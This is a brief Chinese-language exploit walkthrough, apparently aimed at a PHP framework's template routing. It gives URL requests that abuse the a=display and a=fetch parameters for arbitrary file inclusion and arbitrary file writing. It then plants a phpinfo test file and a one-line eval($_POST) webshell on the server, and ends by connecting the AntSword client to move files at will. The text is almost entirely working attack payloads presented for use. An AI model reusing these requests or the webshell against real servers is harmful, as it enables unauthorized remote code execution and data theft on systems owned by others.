1、通过构造a参数的display()方法，实现任意内容包含漏洞

?a=display&templateFile=README.md

通过构造a参数的fetch()方法，不需要知道文件路径就可以实现任意文件写入

?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)
执行，页面是空白的

访问test.php，可以看到phpinfo已经加载出来

创建自己的webshell

1.<?php @eval($_POST[a]);?>

在服务器上写入webshell

?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘t.php’,’<?php @eval($_POST[shell]);?>’)

连接蚁剑

webshell（一句话）地址

这个时候就可以下载或上传你想要的文件了